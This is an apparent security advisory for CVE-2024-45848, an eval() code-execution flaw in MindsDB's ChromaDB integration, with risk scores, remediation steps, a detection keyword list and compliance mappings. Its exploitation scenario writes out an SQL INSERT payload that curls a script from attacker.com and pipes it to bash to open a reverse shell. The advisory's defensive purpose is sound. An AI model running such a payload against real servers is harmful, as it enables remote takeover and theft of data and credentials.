CVE-2024-45848 — HIGH (CVSS 8.8) AI Security Vulnerability

CISO Take

Any authenticated user with low-privilege access to a MindsDB instance running the ChromaDB integration can execute arbitrary Python code on the server. Patch immediately to a version above 24.7.4.1, or disable the ChromaDB engine if patching is not immediately possible. Treat any exposed MindsDB instance as fully compromised until remediated.

Risk Assessment

HIGH. CVSS 8.8 reflects the reality: network-accessible, low complexity, low privileges required. MindsDB is often deployed as an internal AI data layer, but 'internal' does not mean safe — lateral movement from any compromised account or insider threat is sufficient. The attack requires no user interaction and directly yields code execution on the host running the ML platform.

Affected Systems

Package	Ecosystem	Vulnerable Range	Patched
mindsdb	—	—	No patch

Do you use mindsdb? You're affected.

Severity & Risk

CVSS 3.1

8.8 / 10

EPSS

0.4%

chance of exploitation in 30 days

Higher than 63% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Trivial

Exploitation Confidence

medium

○ CISA SSVC: Public PoC

○ Public PoC indexed (trickest/cve)

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV Network

AC Low

PR Low

UI None

S Unchanged

C High

I High

A High

Recommended Action

5 steps

Patch: Upgrade MindsDB to any version beyond 24.7.4.1 — the fix removes the unsafe eval() call.
Workaround: If patching is not immediately possible, disable the ChromaDB integration by removing the chromadb package from the MindsDB environment and restricting CREATE DATABASE with ENGINE=chromadb.
Access control: Enforce least-privilege on MindsDB database users — no user should have INSERT permissions unless explicitly required.
Network segmentation: MindsDB should never be directly internet-facing; enforce firewall rules restricting access to trusted application servers only.
Detection: Alert on SQL INSERT statements targeting ChromaDB engine databases, especially those containing Python builtins (import, os, subprocess, exec, eval, __import__). Monitor for anomalous process spawning from the MindsDB process.

CISA SSVC Assessment

Decision Attend

Exploitation poc

Automatable No

Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Code Execution Data Extraction Framework RAG Plugin AML.T0010.001 - AI Software AML.T0037 - Data from Local System AML.T0049 - Exploit Public-Facing Application AML.T0050 - Command and Scripting Interpreter AML.T0072 - Reverse Shell

Compliance Impact

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity Article 9 - Risk management system

ISO 42001

A.6.2.3 - AI system security A.9.2 - Assessment of AI system

NIST AI RMF

MANAGE-2.2 - Mechanisms are in place and applied to sustain the value of deployed AI systems and manage associated risks

OWASP LLM Top 10

LLM07:2025 - System Prompt Leakage

Frequently Asked Questions

What is CVE-2024-45848?

Any authenticated user with low-privilege access to a MindsDB instance running the ChromaDB integration can execute arbitrary Python code on the server. Patch immediately to a version above 24.7.4.1, or disable the ChromaDB engine if patching is not immediately possible. Treat any exposed MindsDB instance as fully compromised until remediated.

Is CVE-2024-45848 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2024-45848, increasing the risk of exploitation.

How to fix CVE-2024-45848?

1. Patch: Upgrade MindsDB to any version beyond 24.7.4.1 — the fix removes the unsafe eval() call. 2. Workaround: If patching is not immediately possible, disable the ChromaDB integration by removing the chromadb package from the MindsDB environment and restricting CREATE DATABASE with ENGINE=chromadb. 3. Access control: Enforce least-privilege on MindsDB database users — no user should have INSERT permissions unless explicitly required. 4. Network segmentation: MindsDB should never be directly internet-facing; enforce firewall rules restricting access to trusted application servers only. 5. Detection: Alert on SQL INSERT statements targeting ChromaDB engine databases, especially those containing Python builtins (import, os, subprocess, exec, eval, __import__). Monitor for anomalous process spawning from the MindsDB process.

What systems are affected by CVE-2024-45848?

This vulnerability affects the following AI/ML architecture patterns: RAG pipelines, vector databases, AI data platforms, model serving, agent frameworks.

What is the CVSS score for CVE-2024-45848?

CVE-2024-45848 has a CVSS v3.1 base score of 8.8 (HIGH). The EPSS exploitation probability is 0.44%.

Technical Details

NVD Description

An arbitrary code execution vulnerability exists in versions 23.12.4.0 up to 24.7.4.1 of the MindsDB platform, when the ChromaDB integration is installed on the server. If a specially crafted ‘INSERT’ query containing Python code is run against a database created with the ChromaDB engine, the code will be passed to an eval function and executed on the server.

Exploitation Scenario

An attacker with valid (low-privilege) MindsDB credentials — obtained via phishing, credential stuffing, or a misconfigured default account — connects to the MindsDB SQL interface. They execute: CREATE DATABASE vuln_db WITH ENGINE='chromadb'; followed by INSERT INTO vuln_db.collection (content) VALUES ('__import__("os").system("curl attacker.com/shell.sh | bash")'). The eval() function in the ChromaDB handler executes the payload server-side, establishing a reverse shell. The attacker now has full access to the host: vector DB contents, training data, API keys in environment variables, and lateral movement paths to adjacent ML services.